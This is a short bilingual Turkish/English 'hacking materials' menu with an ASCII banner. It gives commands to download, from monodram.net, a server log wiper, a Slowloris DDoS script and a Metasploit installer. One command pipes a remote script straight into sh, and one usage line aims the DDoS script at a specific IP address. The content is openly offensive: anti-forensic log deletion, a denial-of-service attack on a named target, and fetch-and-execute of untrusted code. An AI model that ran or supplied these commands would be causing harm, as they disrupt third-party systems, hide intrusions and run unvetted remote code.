              $$\                 
              $$ |                
$$\  $$\  $$\ $$$$$$$\   $$$$$$\  
$$ | $$ | $$ |$$  __$$\ $$  __$$\ 
$$ | $$ | $$ |$$ |  $$ |$$ /  $$ |
$$ | $$ | $$ |$$ |  $$ |$$ |  $$ |
\$$$$$\$$$$  |$$ |  $$ |\$$$$$$  |
 \_____\____/ \__|  \__| \______/ 
                                  
                                  
                                  
~Hacking Materyaller~
1-> VDS Log Temizleyici | VDS Log Cleaner
2-> DDOS (Slowloris)
3-> Basit Metasploit Yükleme | Metasploit easy installer
~~~---~~~
Komutlar | Commands
1-> wget https://monodram.net/shell/logsil
2-> wget https://monodram.net/shell/ddos -O ddos.pl
3-> curl https://monodram.net/shell/msfyukle.sh | sh
~~~---~~~
Kullanım | Using
1-> chmod +x 
    ./logsil
2-> ddos.pl -dns 88.227.11.33
3-> ./msfyukle.sh
